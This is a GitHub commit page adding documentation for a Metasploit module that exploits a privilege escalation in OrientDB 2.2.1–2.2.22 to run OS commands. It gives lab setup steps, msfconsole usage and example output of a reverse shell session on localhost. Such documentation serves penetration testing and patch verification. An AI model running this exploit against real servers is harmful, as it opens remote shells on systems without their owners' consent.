Skip to content

Commit 00a817d

Browse files
author
Ricardo Almeida
committed
Orientdb 2.2.x RCE - Add documentation
1 parent f3f96ba commit 00a817d

File tree

1 file changed

+44
-0
lines changed

1 file changed

+44
-0
lines changed
Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
2+
3+
All versions from 2.2.1 up to 2.2.22 should be vulnerable.
4+
5+
The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
6+
7+
## Vulnerable Application
8+
OrientDB 2.2.1 <= 2.2.22
9+
10+
## Installation
11+
Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
12+
`$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi`
13+
`$ unzip orientdb-community-2.2.20.zip`
14+
`$ chmod 755 bin/*.sh`
15+
`$ chmod -R 777 config`
16+
`$ cd bin`
17+
`$ ./server.sh`
18+
19+
## References for running OrientDB
20+
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
21+
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
22+
23+
## References for vulnerability
24+
https://blogs.securiteam.com/index.php/archives/3318
25+
http://www.palada.net/index.php/2017/07/13/news-2112/
26+
https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
27+
28+
## Verification Steps
29+
- [ ] Start `msfconsole`
30+
- [ ] `use exploit/multi/http/orientdb_exec`
31+
- [ ] `set rhost <RHOST>`
32+
- [ ] `set target <TARGET_NUMBER>`
33+
- [ ] `set workspace <WORKSPACE>`
34+
- [ ] `check`
35+
- [ ] **Verify** if the OrientDB instance is vulnerable
36+
- [ ] `run`
37+
- [ ] **Verify** you get a session
38+
39+
## Example Output
40+
`[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run`
41+
`[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331`
42+
`[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...`
43+
`[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100`
44+

0 commit comments

Comments
 (0)